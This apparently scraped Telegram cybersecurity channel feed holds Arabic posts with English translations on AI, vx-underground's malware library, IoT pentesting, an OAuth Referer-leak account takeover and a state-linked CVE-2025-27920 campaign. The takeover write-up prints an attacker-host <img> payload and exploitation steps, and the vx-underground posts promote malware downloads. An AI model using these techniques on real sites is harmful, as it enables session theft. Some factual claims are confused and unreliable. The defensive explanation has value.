SPIDER1CODE
1.9K subscribers
130 photos
23 videos
12 files
81 links
Spider1Code is the first Arab community that brings together cybersecurity artificial intelligence, and more 🤍
Download Telegram
A newspaper published news about artificial intelligence and whether AI can control humans 🤖

And we have two characters: Ahmed and Mohamed 👥

Ahmed: Did you see the newspaper? It says AI might replace humans.

Mohamed: I saw that news, but I don’t think so.

Ahmed: No, imagine waking up one day and everything around you is robots, and you're not even real.

Mohamed: You're talking like you're in the Matrix movie.

WARNING: SYSTEM HACKED 🤖

Ahmed: Mohamed
Ahmed: Mohaaaaameddddd!


---

Welcome to an article about Artificial Intelligence 🤖

In the year 1956, specifically by the engineer at the
Dartmouth Conference,

His focus was on solving logical, or more precisely, simple problems.

This invention, which was later called Artificial Intelligence, became a revolution worldwide—
From technology to movies. And humans always had one question in mind:

Can AI replace humans?

The truth is: Yes and No at the same time.

I mean, Spider, I could go to a restaurant and find that the one serving food is a robot, not a human.

You're right, my dear, and this is actually happening in Japan today.

The answer is no to that question because there are jobs that need emotions, things that robots don’t have but humans do—
For example, teaching and nursing, among others.

You might say: “But now there’s education through ChatGPT.”

And I’ll simply tell you: these things are under human supervision.

So, if we ask ChatGPT something that needs emotion or creativity, it won’t be able to answer—
Even after a million years.

So, what are the things AI can replace humans in (in the future)?

Simply, the simple tasks, like:

Driving, delivering food, writing, and a million other simple examples.

But will they not need humans?

The answer is no, my dear—like I told you, humans must be there to complete AI’s work,
Because it was originally made to help and make your life easier.

Now, can AI have emotions?

The answer is yes and no at the same time.

Scientifically: It’s impossible for AI to reach the level of self-awareness like humans.

Philosophically: Maybe it could—why not?

And the proof is that you now see AI in everything around you, from houses to self-driving cars.

So, what’s the solution?

The solution is that humans shouldn’t overuse AI—
Because, in the end, it’s a tool to save your time and effort, not to replace you.

Thank you for reading the article. I hope you liked it and liked the channel’s content.
Don’t forget to check the poll for the next content.
Goodbye 🤍🤖
Forwarded from 𝗕𝗟𝗔𝗖𝗞
موقع vx-underground هو واحد من المواقع المعروفة في مجتمع الهاكرز ومطورين البرمجيات الخبيثة الموقع ده بيعتبر مكتبة ضخمة لأنواع مختلفة من البرمجيات الخبيثة (مالوير) وبيوفر نماذج وموديلوز كتير للمالوير اللي ممكن يستخدموها الهاكرز أو مطورين المالوير في بناء وتطوير أدواتهم الخبيثة الموقع ده ليه مميزات كتير بتجذب الهاكرز ومطورين المالوير ليه بشكل كبير

أول حاجة الموقع بيقدم مجموعة ضخمة من المالوير القديم والجديد يعني لو في هاكر عايز يدرس نوع معين من المالوير أو عايز يطور نسخة جديدة من المالوير اللي موجود بالفعل هيلاقي اللي هو محتاجه على الموقع ده الموقع بيتيح أنواع مختلفة من المالوير زي الفيروسات والتروجانز والرانسوموير والروتكيتس وغيرها ده بيدي فرصة للهاكرز إنهم يلاقوا النماذج اللي هما محتاجينها بسهولة

ثاني حاجة الموقع بيقدم كود المصدر لبعض أنواع المالوير وده بيكون مفيد جدا لمطورين المالوير اللي عايزين يدرسوا الكود ويشوفوا إزاي المالوير بيشتغل ويقدروا يعدلوا عليه أو يطوروا منه وجود الكود بيساعدهم كمان إنهم يتعلموا تقنيات جديدة وأساليب مختلفة في تطوير المالوير

ثالث حاجة الموقع بيتيح كمان مقالات وتقارير عن المالوير وأساليب الهجوم المختلفة وده بيدي فرصة لمطورين المالوير إنهم يوسعوا معرفتهم ويعرفوا أحدث الأساليب والتقنيات اللي بيستخدمها الهاكرز في الهجمات كمان الموقع بيتيح أدوات تحليل المالوير ودي بتساعد المطورين في تحليل المالوير وفهم طريقة عمله واكتشاف نقاط الضعف فيه

من أهم مميزات الموقع كمان إنه بيتيح منتدى للنقاش بين الهاكرز ومطورين المالوير وده بيدي فرصة لتبادل الأفكار والخبرات والأساليب بين أعضاء المجتمع ده بيخلي المجتمع نفسه غني بالمعلومات والخبرات وبيساعد في تطوير أدوات جديدة وأساليب جديدة للهجوم

أهم مميزات الموقع إنه بيتيح تنزيل المالوير بسهولة يعني لو في هاكر عايز ينزل نوع معين من المالوير هيلاقيه بسهولة ويقدر ينزله بسرعة وده بيساعده في تجاربه وتطويره لأدواته الخاصة الموقع بيحافظ كمان على تحديث قاعدة البيانات بتاعته باستمرار عشان يضمن إن الأعضاء يلاقوا أحدث أنواع المالوير اللي موجودة في السوق

لكن من المهم جدا نفهم إن استخدام الموقع ده لتحميل المالوير وتطوير أدوات خبيثة هو جريمة وممكن يعرضك للمسائلة القانونية لازم تستخدم المعلومات والأدوات دي بشكل قانوني وفي أغراض الاختبار الأمني وتقييم الأنظمة بتاعتك أو الأنظمة اللي عندك إذن رسمي لاختبارها

الموقع بيساعد بشكل كبير في تحسين الأمان وحماية الأنظمة من الهجمات الحقيقية اللي بيستخدم فيها الهاكرز الأدوات دي لإلحاق الضرر بالأجهزة والأنظمة استخدام الموقع بشكل سليم بيدي فرصة لفهم المالوير وتطوير أدوات دفاعية جديدة لتحمي الأنظمة والشبكات من الهجمات.

بالتالي موقع vx-underground هو واحد من أهم المواقع لمطورين المالوير والهاكرز عشان بيتيح مجموعة ضخمة من المالوير وموديلوز مختلفة بيتيح كود المصدر ومقالات وتقارير عن المالوير وأساليب الهجوم المختلفة بيتيح أدوات تحليل المالوير ومنتدى للنقاش بين الأعضاء وبيتيح تنزيل المالوير بسهولة الموقع بيساعد في تحسين الأمان وحماية الأنظمة لو استخدم بشكل سليم وفي أغراض الاختبار الأمني.

رابط الموقع
موقع vx-underground معروف بأنه واحد من المصادر الرئيسية لمطورين البرمجيات الخبيثة والهاكرز للحصول على نماذج وموديلوز المالوير بمختلف أنواعها الموقع ده بيوفر مكتبة ضخمة من المالوير سواء القديم أو الحديث اللي ممكن الهاكرز يستخدموها في تطوير أدواتهم وطرق الهجوم بتاعتهم ومن ضمن الحاجات المميزة اللي بيقدمها الموقع هو مشروع VX-API واللي هو عبارة عن مجموعة من الـAPIs اللي بتساعد مطورين المالوير في إنهم ينفذوا عمليات معينة بسهولة وكفاءة وده بيسهل عليهم عملية التطوير والاختبار للمالوير بتاعهم

مشروع VX-API الموجود على GitHub هو مشروع مفتوح المصدر والهدف منه توفير مجموعة من الـAPIs اللي بتسهل تنفيذ عمليات مختلفة زي تنفيذ أوامر النظام إنشاء اتصالات بالشبكة التحكم في العمليات والذاكرة وغيرها الكود الموجود في المشروع مكتوب بلغات مختلفة زي السي والسي++ والبايثون وده بيدي مرونة أكبر للمطورين إنهم يختاروا اللغة اللي بيفضلوا يشتغلوا بيها

واحدة من أهم مميزات الـAPI ده إنه بيسهل على مطورين المالوير تنفيذ العمليات اللي ممكن تكون معقدة أو محتاجة وقت طويل عشان تتعمل بشكل يدوي يعني مثلا لو مطور عايز يعمل اتصال بالشبكة أو ينفذ أمر معين على الجهاز المصاب يقدر يستخدم الدوال اللي موجودة في الـAPI بدل ما يكتب الكود من الأول وده بيوفر وقت وجهد كبير للمطورين كمان الـAPI بيجي مع وثائق شاملة بتوضح إزاي تستخدم الدوال المختلفة وده بيساعد المطورين في فهم واستخدام الـAPI بسهولة

من الأمثلة على الدوال اللي بيوفرها الـAPI: دوال لإنشاء اتصالات TCP أو UDP ودوال لتنفيذ أوامر النظام ودوال للتحكم في العمليات والذاكرة ودوال لجمع المعلومات عن النظام دي كلها دوال بتسهل على مطورين المالوير تنفيذ العمليات دي بسرعة وكفاءة

من الحاجات المهمة كمان في الـAPI إنه بيوفر دوال للتحكم في ملفات النظام زي دوال لقراءة وكتابة الملفات ودوال لإنشاء وحذف الملفات والمجلدات دي حاجات بتسهل على المطورين إنهم يتحكموا في الملفات بتاعت النظام المصاب ويستخدموها في الهجوم بتاعهم

استخدام الـAPI ده بيساعد مطورين المالوير إنهم يطوروا أدواتهم بسرعة أكبر وبكفاءة أعلى وده بيخلي عملية تطوير المالوير أسهل وأسرع بكتير كمان بيساعدهم في تنفيذ الهجمات بشكل أفضل وأكثر تعقيدا لأنهم بيكونوا قادرين على استخدام الدوال الجاهزة دي في تنفيذ عملياتهم بسهولة



بالتالي مشروع VX-API هو مشروع مفتوح المصدر بيوفر مجموعة من الـAPIs اللي بتساعد مطورين المالوير في تنفيذ عمليات مختلفة زي تنفيذ أوامر النظام إنشاء اتصالات بالشبكة التحكم في العمليات والذاكرة التحكم في ملفات النظام وجمع المعلومات عن النظام المشروع مكتوب بلغات مختلفة زي السي والسي++ والبايثون وبيجي مع وثائق شاملة بتوضح إزاي تستخدم الدوال المختلفة استخدام الـAPI بيساعد المطورين في تطوير أدواتهم بسرعة وكفاءة وبيسهل عليهم عملية تنفيذ الهجمات بشكل أفضل وأسرع الموقع بيساعد في تحسين الأمان وحماية الأنظمة لو استخدم بشكل
سليم وفي أغراض الاختبار الأمني.

رابط المشروع على جيت هوب
SPIDER1CODE
موقع vx-underground هو واحد من المواقع المعروفة في مجتمع الهاكرز ومطورين البرمجيات الخبيثة الموقع ده بيعتبر مكتبة ضخمة لأنواع مختلفة من البرمجيات الخبيثة (مالوير) وبيوفر نماذج وموديلوز كتير للمالوير اللي ممكن يستخدموها الهاكرز أو مطورين المالوير في بناء وتطوير…
VX-Underground is one of the well-known websites in the hacker and malware developer communities. This site is considered a massive library for different types of malware, providing many samples and models that hackers or malware developers can use to build and enhance their malicious tools. The site has many features that make it highly attractive to hackers and malware creators.

First, the site offers a huge collection of both old and new malware. So, if a hacker wants to study a specific type of malware or develop a new version of an existing one, they’ll find what they need on this site. It provides various types of malware like viruses, trojans, ransomware, rootkits, and more. This makes it easier for hackers to find the exact samples they need.

Second, the site offers source code for some types of malware. This is extremely useful for malware developers who want to study the code, understand how the malware works, and possibly modify or improve it. Access to source code also helps them learn new techniques and different methods of malware development.

Third, the site also provides articles and reports about malware and various attack techniques. This helps malware developers expand their knowledge and stay up to date with the latest methods and technologies used in real-world attacks. The site also offers malware analysis tools, which help developers analyze malware, understand its behavior, and identify its weaknesses.

One of the site’s major features is its forum for discussion between hackers and malware developers. This creates opportunities for sharing ideas, experiences, and techniques among community members, making the community rich in knowledge and expertise, and helping in the development of new tools and attack strategies.

Another key feature of the site is that it allows easy downloading of malware. So if a hacker is looking for a specific type of malware, they can find and download it quickly. This helps them in testing and developing their own tools. The site also keeps its database regularly updated to ensure that members can find the latest malware samples available in the wild.

However, it’s very important to understand that using this site to download malware and develop malicious tools is illegal and could lead to legal consequences. The information and tools provided should be used legally, for security testing purposes, and only on systems you own or have explicit permission to test.

The site can greatly help in improving cybersecurity and protecting systems from real attacks where hackers use these tools to cause harm. Using the site in a proper and legal way gives professionals the chance to understand malware and develop new defensive tools to protect systems and networks.

In conclusion, vx-underground is one of the most important websites for malware developers and hackers. It offers a vast collection of malware samples and models, provides source code, articles, and reports about malware and attack techniques, offers malware analysis tools and a discussion forum, and allows easy downloading of malware. If used properly and for legal purposes, the site can help improve security and protect systems.

Website link: vx-underground.org
SPIDER1CODE
موقع vx-underground معروف بأنه واحد من المصادر الرئيسية لمطورين البرمجيات الخبيثة والهاكرز للحصول على نماذج وموديلوز المالوير بمختلف أنواعها الموقع ده بيوفر مكتبة ضخمة من المالوير سواء القديم أو الحديث اللي ممكن الهاكرز يستخدموها في تطوير أدواتهم وطرق الهجوم…
VX-Underground is known as one of the main sources for malware developers and hackers to obtain various types of malware samples and models. The site provides a massive library of both old and new malware, which hackers can use to develop their tools and improve their attack techniques. One of the notable features offered by the site is the VX-API project, which is a collection of APIs designed to help malware developers perform specific operations easily and efficiently. This simplifies the process of developing and testing their malware.

The VX-API project, available on GitHub, is an open-source project aimed at providing a set of APIs that simplify the execution of various operations such as executing system commands, establishing network connections, managing processes and memory, and more. The code in the project is written in multiple languages like C, C++, and Python, which gives developers flexibility to work in the language they prefer.

One of the key features of this API is that it simplifies complex or time-consuming tasks that would otherwise require writing a lot of code manually. For example, if a developer wants to establish a network connection or execute a specific command on an infected device, they can use the built-in functions provided by the API instead of coding everything from scratch. This saves a lot of time and effort. The API also comes with comprehensive documentation that explains how to use the various functions, making it easier for developers to understand and use the API.

Some examples of functions provided by the API include: functions for creating TCP or UDP connections, executing system commands, managing processes and memory, and gathering system information. These are all functions that make it much easier and more efficient for malware developers to perform such tasks.

Another important feature of the API is that it provides functions for managing system files, such as reading and writing files, and creating or deleting files and directories. These capabilities allow developers to manipulate files on the infected system as part of their attack.

Using this API helps malware developers build their tools more quickly and efficiently, making the malware development process much easier and faster. It also helps them carry out more sophisticated attacks, since they can rely on these ready-made functions to execute their operations.

In conclusion, VX-API is an open-source project that offers a set of APIs to help malware developers perform tasks like executing system commands, establishing network connections, managing processes and memory, controlling system files, and gathering system information. The project is written in multiple languages such as C, C++, and Python, and includes detailed documentation for using its various functions. Using the API allows developers to build tools faster and more efficiently, and makes it easier to execute attacks in a more advanced and effective way. The site can also contribute to improving security and system protection if used properly and for legitimate security testing purposes.

GitHub link to the project: https://github.com/vxunderground/VX-API
Forwarded from 𝗕𝗟𝗔𝗖𝗞
Forwarded from 𝗕𝗟𝗔𝗖𝗞
Windows API for Red Team 101 - English.pdf
1000.7 KB
Forwarded from 𝗕𝗟𝗔𝗖𝗞
Forwarded from 𝗕𝗟𝗔𝗖𝗞
Windows API for Red Team 102 English.pdf
588.1 KB
ازيك يا عزيزي اخبارك اي ؟

طبعا انا عارف اني اتاخرت عليك بقالي فتره و بلاك بينزل مكاني بس اوعدك اخلص امتحانات و دراسه عشان الدنيا مش مظبوطه


موضوع النهارده عن iot 🚗

بص يعزيزي iot بداء من ايام التسعينيات من سنه 1999 تحديدا فل قرن 21

بداء علي ايد المهندس Kevin Ashton وهو كان شغال في شركه P&G

كيفين كان بيحاول يربط لاجهزه بينها وبين لانترنت عشان يربط لاجهزه

و اقترح انو يستخدم RFID و بعدها بداء يربط لاشياء بل لانترنت

علي كد نجح ؟

هو نجح ف تاسيس الفكره و اثر علي تطوير RFID و قال جملتو المشهوره

" The Internet of Things has the potential to change the world, just as the Internet did. Maybe even more so "

طيب بعد ما عرفنا عنو هل في تدخل بينو و بين السايبر سكيورتي ؟

اكيد و التراك اسمو

Iot pentest

فل تراك دا لزم تتعلم عن الهارد وير و النت ورك و لاجهزه زي السوفت وير

لزم تتعلم تفهم بروتوكولات زي

MQTT

او

CoAP

او

BLE

او

Zigbee

تتعلم كورس Hardware Hacking

رابط كورس

https://www.classcentral.com/course/youtube-levelup-0x02-hardware-hacking-101-179440
1
Hey my friend, how are you doing?

I know I’ve been away for a while and Black has been taking my place, but I promise I’ll be back fully after I finish my exams and studies — things have just been a bit hectic.

Today’s topic is about IoT! 🚗

So listen, my friend — IoT started back in the 1990s, specifically in 1999, which is in the 21st century.

It all began with engineer Kevin Ashton, who was working at P&G.

Kevin was trying to find a way to connect devices to the internet — basically, making things communicate through the web.

He suggested using RFID, and from there, the idea of connecting objects to the internet really took off.

Did he succeed?

Yes, he succeeded in establishing the core idea, and he had a major impact on developing RFID. He even said his famous quote:

> "The Internet of Things has the potential to change the world, just as the Internet did. Maybe even more so."



So, is there a connection between IoT and Cybersecurity?

Absolutely — and that track is called:

> IoT Pentesting



In this track, you need to learn about hardware, networking, and devices — just like you would with software.

You’ll also need to understand protocols like:

MQTT

CoAP

BLE

Zigbee


And you definitely need to take a course on Hardware Hacking.

Here’s a great free course:

https://www.classcentral.com/course/youtube-levelup-0x02-hardware-hacking-101-179440
2025/5/12
------------------


شات بين بلاك و سبايدر *


بلاك : اخبارك يا سبايدر

سبايدر : في ثغره غريبه حصلت عندي

بلاك : اي هيا

سبايدر : فجاه شخص غريب دخل عندي علي حساب و انا فاتح من كروم

بلاك : شكلك مش شوفت مقال سبايدر سيك عنو

سبايدر : وريني كد ؟

----------------------------------------------------

ازيك يعزيزي عامل اي 🤖❤️

عنوان المقال :

Zero day account takeover

بص يعزيزي المقال دا قالب الدنيا ف التيم لاين لاجنبي و حبيت اشارك معكم بل عربي ف ياريت تشير المحتوي و القناه ❤️

في سنه 2025 شهر 5 الي هو شهر عيد ميلادي 😂❤️

ظهر ثغره تم تبليغه علي هكر ون الثغره بعنوان

Account takeover with on line html


الثغره تعتبر خطيره من نوع Critical

و تنصيفها عالي علي هكر ون

بتشتغل ازاي دي يسبايدر ؟

ببساطه الثغره بتستهدف

( session hijacking )

و بتشتغل عن طريق وضع بايلود في

<img>

واحد في html و عن طريقو يقدر يعمل هجوم OAuth code و يسرق جلسه المستخدم و يعمل takeover

ببساطه المخترق بيدمج ما بين هجومين

( OAUTH Flow )
و
( Referrer Policy Manipulation )

عن طريق img زي ما قولنا و الي بيحصل انه بيتسرب
Tokens او codes

الخاصه ب الجلسه تحديدا جلسه تسجيل الدخول

ببساطه ال
( OAUTH )

بتشتغل عن طريق تسجيلك في موقع زي جوجل مثلا المتصفح بتاعك بيروح علي صفحه تسجيل الدخول الخاصه ب جوجل و بعد ما المستخدم يسجل دخول ...

يبعت المتصفح بتاعو

( authorization code )

في رابط رجعو بتاع url يقوم الموقع لاصلي مبدلو بل access token

* مثال *

https://example.com/callback?code=abc123xyz


طيب اي دخل ال referrer head و police ؟

دخلهم انهم بيتم فيهم الثغره في حال عدم حمايه ليهم بشكل كويس

* مثال *

Referer: https://secure.site.com/auth?code=abc123



كل دا كان بدايه لي شرح الهجوم الهجوم بيتم عن طريق ان المهاجم بيجي بجهاز السيرفر بتاعو تحديدا ب استخدام

( index.php )

السيرفر بتاعو فيدتو انو لما يبعت صوره imp.png مثلا تكون صوره pixel 1x1

"صوره شفافه" طب و بعدين يضيف في الطلب

Referrer-Policy: unsafe-url


عشان يخلي الموقع لو حد طلب الصورة دي من موقعك ابعت الـ referrer كامل بالـ URL وكل الـ query parameters

طيب ازاي بيتم استغلال ؟

المهاجم بعد ما بيعمل كد بينتظر لحد ما يجي عندو صفحه فيها مثلا htmli بيكون فيها xss بس مش بل كامل يقدر يضيف img و يحقن الكود بشكل دا

img src="https://attacker.com/img.png" />


و بعدها الضحيه يجي يسجل الدخول و يتحول علي redirect_uri وهو بيتحول الموقع بيفتح ملف img الي محطوط في السيرفر ملغم و بعدها المتصفح بيطلب الصورة دي ويرسل كامل الـ URL كـ referrer بسبب الهيدر اللي رجعه المهاجم في أول استجابة بعدها المهاجم يلقط الكود الموجود في الـ referrer، ويسرق الجلسة

طيب اي نقاط قوه الهجوم ؟

يعتمد على XSS.

لا يعتمد على Open Redirect

لا يحتاج حتى تنفيذ JavaScript

يعتمد على ثغرة في الـ browser behavior (المتصفح نفسه)

طيب اي الحمايه ؟

لا تستخدم query parameters لتخزين بيانات حساسة زي OAUTH codes، خصوصًا لو في خطر إنه يتم تحميل صور من مصادر غير موثوقة

لو انت صاحب الموقع استخدم referrer-policy كويسه زي

strict-origin-when-cross-origin

أو
no-referrer

أمن صفحاتك ضد HTML injection، مش بس XSS.

لو عندك OAUTH flow، اربط الكود بعنوان الـ IP أو session المؤقتة وما تسمحش بإعادة استخدامه

مثال واقعي للهجوم خطوة بخطوة:

1. الضحية يروح يسجل دخول من https://secure.site.com/auth?code=abc123.


2. المتصفح يعرض صفحة فيها <img src="https://attacker.com/img.png" />.


3. المتصفح يبعت طلب للصورة دي ومعاه:

Referer: https://secure.site.com/auth?code=abc123

4. سيرفر المهاجم يسجل الكود abc123.


5. المهاجم يدخل به على الموقع، كأنه الضحية


مصدر :

https://youtu.be/Pi37YwraPBg?si=uNiEOtOGbZlouYS9
2
2025/5/12

Chat between Black and Spider

Black: What’s up, Spider?

Spider: I just encountered a weird vulnerability.

Black: What is it?

Spider: Out of nowhere, someone managed to log into my account while I was browsing with Chrome.

Black: Sounds like you haven’t seen SpiderSec’s post about it.

Spider: Show me then?


---

Hey my friend, how are you doing? 🤖❤️

Article Title:

Zero Day Account Takeover

Look my friend, this article shook the English cybersecurity timeline, so I thought I’d share it with you in Arabic—please share the content and the channel if you find it useful ❤️

In May 2025, which is also my birthday month 😂❤️
A vulnerability was reported on HackerOne titled:

“Account takeover with only inline HTML”

This vulnerability is considered critical and has a high severity rating on HackerOne.


---

So how does this work, Spider?

Simply put, the vulnerability targets:

Session Hijacking

It works by placing a payload inside an <img> element in HTML. This is then used to launch an OAuth code attack to steal the user's session and take over the account.

The attacker combines two techniques:

1. OAuth Flow


2. Referrer Policy Manipulation



Using an <img> tag as the weapon, what happens is:
Session tokens or login codes are leaked, allowing account takeover.


---

OAuth Flow explained simply:

OAuth works like this:

You try to sign in with a service like Google.

Your browser redirects you to Google’s login page.

Once logged in, Google sends back an authorization code in the redirect URL.

The original site then exchanges this code for an access token.


Example:

https://example.com/callback?code=abc123xyz


---

What’s the role of Referrer headers and policies?

They’re where the vulnerability lies—if not properly protected.

Example:

Referer: https://secure.site.com/auth?code=abc123


---

This is where the attack begins:

The attacker sets up a server—specifically with an index.php file.
The server returns a small 1x1 transparent image, like img.png.
But here's the trick—it includes this header:

Referrer-Policy: unsafe-url

This tells the browser:
“If anyone loads this image from your site, send the full referrer URL including query parameters.”


---

So how is it exploited?

1. The attacker finds a page with HTML injection (not full XSS—just enough to inject an <img>).


2. He injects this tag:



<img src="https://attacker.com/img.png" />

3. The victim signs in using OAuth and gets redirected to a redirect_uri that contains the code in the URL.


4. Before the redirect completes, the browser loads the attacker’s <img> tag.


5. The browser sends a request to the attacker’s server, including the full URL as a Referer header (with the code).


6. The attacker captures the code and uses it to hijack the session.




---

Strengths of the attack:

Does not rely on Open Redirect.

Does not require JavaScript execution.

Exploits browser behavior itself.

Works with only HTML injection, not full XSS.



---

How to protect against it?

Never store sensitive OAuth codes in query parameters—especially if there's a chance of third-party image loading.

Use a secure referrer-policy like:

strict-origin-when-cross-origin

no-referrer


Harden your pages against HTML injection, not just XSS.

For OAuth flows, tie the code to an IP address or temporary session, and don’t allow reuse.



---

Realistic step-by-step attack:

1. Victim signs in from:
https://secure.site.com/auth?code=abc123


2. The site includes:



<img src="https://attacker.com/img.png" />

3. The browser sends:



Referer: https://secure.site.com/auth?code=abc123

4. The attacker’s server logs the code=abc123.


5. Attacker uses the code to log in as the victim.




---

Source:
https://youtu.be/Pi37YwraPBg?si=uNiEOtOGbZlouYS9
1
Forwarded from 『Clippy』
الفرق بين كود مبرمج بايثون محترف
و مبرمج بايثون مبتدئ


لو عايز تقول مثلًا:
city's temp is 34

بالمبتدئ:
city = "Cairo"
temp = 34

print(city, "'s temp is", temp)

بالمحترف:
city = "Cairo"
temp = 34
print(f"{city}'s temp is {temp}")

النتيجة:
Cairo's temp is 34

شايف الفرق في الكود التاني ؟ الكود بقى أنضف وأسهل في القراءة.

ده طبعا مثال بسيط بيكون باين اكتر لو عامل بروجكت كبير
المبرمج المحترف بيستخدم طرق زي

Format


print("{}'s temp is {}".format(city, temp))

لاكن دي برضه طريقه قديمه شويه
في حاليا طرق زي

2. استخدام f-strings
(من بايثون 3.6 وطالع):

python

print(f"{city}'s temp is {temp}")

زي اول مثال فوق.

الخلاصة:

الفرق بين المبتدئ والمحترف مش في الأدوات، بل في طريقة الاستخدام.
عزيزي اخبارك اي 🙈❤️


عايز اقولك قبل ما نبداء شكرا علي دعم رهيب و كل ما دعم كان احسن كل ما كنا احسن و احسن


موضوع المقال :

هجوم حصل علي عراق ( zero day )



في صباح اليوم الي هو النهارده بتاريخ


2025/5/13



حصل اختراق علي مجموعه حساسه و مهمه في العراق عن طريق مجموعه اسمه

Marbled Dust


دول يعزيزي مجموعه مدعومه من تركيا هدفها التجسس و ليهم اسماء تانيه زي

Cosmic Wolf، Sea Turtle، Teal Kurma، UNC1326


المهم الهجوم بداء من شهر ابريل عام 2024 لحد وقت كتابه المقال

حصل انهم اكتشفو ثغره في برنامج

Output Messenger


من اول اصدار 2.0.62 و الي قبلو

اكتشفو استغلال لي cve تحديدا

CVE-2025-27920


ال cve بيتم عن طريق ثغره اسمه

Directory Traversal Vulnerability


الوصف الفني : تسمح للمهاجم عن بُعد و بعد المصادقة بالوصول إلى ملفات النظام أو تنفيذ ملفات غير مصرح بها عبر السيرفر من خلال استغلال ضعف في التحقق من المسارات داخل تطبيق إدارة السيرفر (Server Manager)

و درجه الخطوره معديه 7.5 يعني اعلي من 7.5

( لم يتم نشر تقييم CVSS الرسمي بعد )

بس انا قولت اخمنها يعني 😂


طريقة الاستغلال :

1. الوصول إلى السيرفر كـ"مستخدم مصادق".


2. استغلال ضعف التحقق من مسارات الملفات.


3. إسقاط ملفات ضارة داخل مجلد بدء التشغيل الخاص بالسيرفر، مثل:

OM.vbs

OMServerService.vbs

OMServerService.exe
(backdoor مكتوب بلغة Go)

لاثر لامني :

1 : RCE

2 : Backdoors

3 : Credentials

4 : C2 Servers
مثلا

api.wordinfos[.]com

5 : information disclosure


الملفات الخبيثة :

OM.vbs : سكربت مسؤول عن تشغيل باقي الملفات.

OMServerService.vbs : سكربت يُشغّل الباك دور.

OMServerService.exe : Backdoor بلغة Golang للاتصال بـ C2.

OMClientService.exe : Backdoor يُستخدم في جانب الضحية (client).


الخطوات الموصى بها للحماية :

1. تحديث البرنامج إلى الإصدار 2.0.63 أو أحدث فورًا.


2. مراقبة الاتصالات الصادرة إلى api.wordinfos[.]com.


3. فحص ملفات OM*.vbs و OM*.exe داخل مجلدات بدء التشغيل.


4. مراجعة سجلات الدخول (logs) لاكتشاف أي استخدام مشبوه.


5. تطبيق عزل الشبكة (Segmentation) على الخوادم الحساسة.


هتسالني اي دخل العراق فل موضوع ؟

هرد عليك ببساطه يعزيزي انهم كانو مستهدفين من المجموعه التركيا

لاشخاص المستهدفه كانو زي

أشخاصًا مرتبطين بالقوات الكردية العاملة في العراق



يعني :

المجموعة كانت تستهدف مستخدمين أكراد داخل العراق

(أفراد من الجيش أو الأمن أو الإدارات الكردية)

الأهداف لم تكن عامة، بل مركزة ضمن حملة تجسس إلكتروني

و شكرا علي قرائه المقال 🤍

مصدر :

https://thehackernews.com/2025/05/turkiye-hackers-exploited-output.html
Zero-Day Attack Targets Sensitive Kurdish Entities in Iraq – CVE-2025-27920 Analysis

Date: May 13, 2025
Author: Mohamed Ahmed Abo El-Yazid


---

Dear friend,
Before we begin—thank you for the incredible support. The better the support, the better we become together.


---

Overview of the Attack

On the morning of May 13, 2025, a cyber espionage attack targeting sensitive and critical entities in Iraq was uncovered. The threat actor behind the operation is a Türkiye-affiliated group known as:

Marbled Dust

Also known as: Cosmic Wolf, Sea Turtle, Teal Kurma, UNC1326


This campaign has reportedly been active since April 2024.


---

Vulnerability Information

The attackers exploited a zero-day vulnerability in the enterprise communication platform Output Messenger, specifically affecting versions 2.0.62 and earlier.

CVE: CVE-2025-27920

Type: Directory Traversal Vulnerability

Affected Component: Server Manager application

Risk Level (estimated): 7.5+ (pending CVSS official rating)


Technical Description:

This vulnerability allows authenticated remote attackers to access system files or execute unauthorized scripts by exploiting weak path validation logic inside the Output Messenger Server Manager.


---

Attack Chain Breakdown

1. Initial Access:
Attacker gains access to Output Messenger Server as an authenticated user (possibly via DNS hijacking or typosquatting to steal credentials).


2. Exploitation:
Using CVE-2025-27920, the attacker drops malicious payloads in critical folders like the server startup directory and the Public/Videos folder.


3. Payloads Used:

OM.vbs: Executes other malicious files.

OMServerService.vbs: Triggers the Golang backdoor.

OMServerService.exe: A Golang-based backdoor.

OMClientService.exe: Another Golang backdoor that runs on client devices.





---

Observed Impact

Remote Code Execution (RCE)

Credential Theft

Persistence via Startup Scripts

Backdoor Installation

Communication with C2 server:
api.wordinfos[.]com

Information Disclosure



---

Recommended Mitigations

1. Update Output Messenger to version 2.0.63 or later.


2. Monitor outbound traffic for suspicious domains like api.wordinfos[.]com.


3. Scan startup folders for files named OM*.vbs or OM*.exe.


4. Audit server access logs for any unusual login activity.


5. Apply network segmentation for critical servers.




---

Why Iraq Was Targeted

You may wonder: what does Iraq have to do with this attack?

The answer is simple. The attack specifically targeted Kurdish individuals and entities in Iraq, likely including:

Members of the Kurdish military

Security forces

Administrative organizations


This campaign was not random — it was part of a targeted cyber espionage operation aimed at Kurdish users of Output Messenger operating within Iraq.



Source :

https://thehackernews.com/2025/05/turkiye-hackers-exploited-output.html
محتوي المره الجايه : Next time content
Anonymous Poll
82%
Red team : فريق لاحمر
9%
Blue team : فريق لازرق
9%
Ai : ذكاء اصطناعي